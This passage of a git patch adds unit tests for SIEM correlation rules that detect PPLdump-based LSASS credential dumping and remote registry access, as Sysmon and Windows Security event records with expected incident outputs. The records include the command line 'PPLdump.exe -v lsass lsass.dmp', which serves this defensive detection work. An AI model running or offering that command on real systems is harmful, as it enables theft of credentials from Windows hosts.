"object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.016Z", "type": "raw", "uuid": "8aa256e5-1783-4d78-bb1e-b60d5d861d68"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0831522Z\"},\"EventRecordID\":\"564594\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.066\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7188\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x103801\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+485d2|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45163|C:\\\\Windows\\\\System32\\\\ADVAPI32.dll+1c20f|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+1c47|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\ADVAPI32.dll+1c20f|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+1c47|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.id": "7188", "object.process.name": "services.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x103801", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.066Z", "type": "raw", "uuid": "3182b375-c9ee-4c6e-844b-010b44ca4ce1"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0847648Z\"},\"EventRecordID\":\"564595\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.066\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-0010e5580000}\"},{\"Name\":\"SourceProcessId\",\"text\":\"504\"},{\"Name\":\"SourceThreadId\",\"text\":\"264\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\csrss.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7188\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\system32\\\\basesrv.DLL+2fda|C:\\\\Windows\\\\SYSTEM32\\\\CSRSRV.dll+5e2a|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a27f\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "264", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\system32\\basesrv.DLL+2fda|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5e2a|C:\\Windows\\SYSTEM32\\ntdll.dll+6a27f", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", 
"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.id": "7188", "object.process.name": "services.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:00:22.549Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\csrss.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010e5580000", "subject.process.id": "504", "subject.process.name": "csrss.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:26.066Z", "type": "raw", "uuid": "4451a9cd-e6a6-481d-9934-ab8ebe2ca2e2"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "264", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\system32\\basesrv.DLL+2fda|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5e2a|C:\\Windows\\SYSTEM32\\ntdll.dll+6a27f", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", "object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "7188", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", 
"object.process.parent.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.parent.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.parent.id": "6316", "object.process.parent.name": "ppldump.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.process.fullpath": "c:\\windows\\system32\\csrss.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010e5580000", "subject.process.id": "504", "subject.process.name": "csrss.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc new file mode 100644 index 00000000..4df6035e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc 
@@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:35.2842251Z\"},\"EventRecordID\":\"564605\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:35.263\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f41f-6081-0000-001078834a00}\"},{\"Name\":\"ProcessId\",\"text\":\"6644\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s fdPHost\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-6e1a-6082-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"624\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-6e1a-6082-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": 
"8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6644", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "624", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:05:54.727Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:35.263Z", "type": "raw", "uuid": "990452ea-e6c1-474f-9548-a07ae741a722"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:35.2846041Z\"},\"EventRecordID\":\"564606\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:35.276\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-0010f6600000}\"},{\"Name\":\"SourceProcessId\",\"text\":\"624\"},{\"Name\":\"SourceThreadId\",\"text\":\"2368\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f41f-6081-0000-001078834a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"6644\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+485d2|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45163|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1cd9f|C:\\\\Windows\\\\system32\\\\services.exe+9f39|C:\\\\Windows\\\\system32\\\\services.exe+c665|C:\\\\Windows\\\\system32\\\\services.exe+90d5|C:\\\\Windows\\\\system32\\\\services.exe+8d4c|C:\\\\Windows\\\\system32\\\\services.exe+de2d|C:\\\\Windows\\\\system32\\\\services.exe+15a8e|C:\\\\Windows\\\\system32\\\\services.exe+15d78|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+77803|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+1436c|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+1756a|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+54a18|
C:\\\\Windows\\\\System32\\\\RPCRT4.dll+30490|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+2fe3b|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+221ff|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+2165a|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+20c21|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+20692|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+17465|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4f4d0|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+50358\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2368", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\KERNEL32.DLL+1cd9f|C:\\Windows\\system32\\services.exe+9f39|C:\\Windows\\system32\\services.exe+c665|C:\\Windows\\system32\\services.exe+90d5|C:\\Windows\\system32\\services.exe+8d4c|C:\\Windows\\system32\\services.exe+de2d|C:\\Windows\\system32\\services.exe+15a8e|C:\\Windows\\system32\\services.exe+15d78|C:\\Windows\\System32\\RPCRT4.dll+77803|C:\\Windows\\System32\\RPCRT4.dll+1436c|C:\\Windows\\System32\\RPCRT4.dll+1756a|C:\\Windows\\System32\\RPCRT4.dll+54a18|C:\\Windows\\System32\\RPCRT4.dll+30490|C:\\Windows\\System32\\RPCRT4.dll+2fe3b|C:\\Windows\\System32\\RPCRT4.dll+221ff|C:\\Windows\\System32\\RPCRT4.dll+2165a|C:\\Windows\\System32\\RPCRT4.dll+20c21|C:\\Windows\\System32\\RPCRT4.dll+20692|C:\\Windows\\System32\\RPCRT4.dll+17465|C:\\Windows\\SYSTEM32\\ntdll.dll+4f4d0|C:\\Windows\\SYSTEM32\\ntdll.dll+50358", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", 
"mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.id": "6644", "object.process.name": "svchost.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:05:54.727Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\services.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010f6600000", "subject.process.id": "624", "subject.process.name": "services.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:35.276Z", "type": "raw", "uuid": "71be7ec4-775e-4545-8608-32b6e6aa7510"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2368", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\KERNEL32.DLL+1cd9f|C:\\Windows\\system32\\services.exe+9f39|C:\\Windows\\system32\\services.exe+c665|C:\\Windows\\system32\\services.exe+90d5|C:\\Windows\\system32\\services.exe+8d4c|C:\\Windows\\system32\\services.exe+de2d|C:\\Windows\\system32\\services.exe+15a8e|C:\\Windows\\system32\\services.exe+15d78|C:\\Windows\\System32\\RPCRT4.dll+77803|C:\\Windows\\System32\\RPCRT4.dll+1436c|C:\\Windows\\System32\\RPCRT4.dll+1756a|C:\\Windows\\System32\\RPCRT4.dll+54a18|C:\\Windows\\System32\\RPCRT4.dll+30490|C:\\Windows\\System32\\RPCRT4.dll+2fe3b|C:\\Windows\\System32\\RPCRT4.dll+221ff|C:\\Windows\\System32\\RPCRT4.dll+2165a|C:\\Windows\\System32\\RPCRT4.dll+20c21|C:\\Windows\\System32\\RPCRT4.dll+20692|C:\\Windows\\System32\\RPCRT4.dll+17465|C:\\Windows\\SYSTEM32\\ntdll.dll+4f4d0|C:\\Windows\\SYSTEM32\\ntdll.dll+50358", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.session_id": "997", 
"object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6644", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "624", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "subject.process.fullpath": "c:\\windows\\system32\\services.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010f6600000", "subject.process.id": "624", "subject.process.name": "services.exe"} From 1b2195843b9538f80e5e3eb8123451cce357a21b Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Sat, 29 Jul 2023 19:56:29 +0300
Subject: [PATCH 15/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Remote?= =?UTF-8?q?=5Fregistry=5Faccess)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Remote_registry_access/tests/test_1.sc | 6 ++++++
.../Remote_registry_access/tests/test_2.sc | 6 ++++++
2 files changed, 12 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc
new file mode 100644
index 00000000..ec0dd2a7
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc 
@@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.1093750Z\"},\"EventRecordID\":\"11412798\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"520\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"SubjectUserName\",\"text\":\"adm_back\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"192.168.224.50\"},{\"Name\":\"IpPort\",\"text\":\"54783\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or 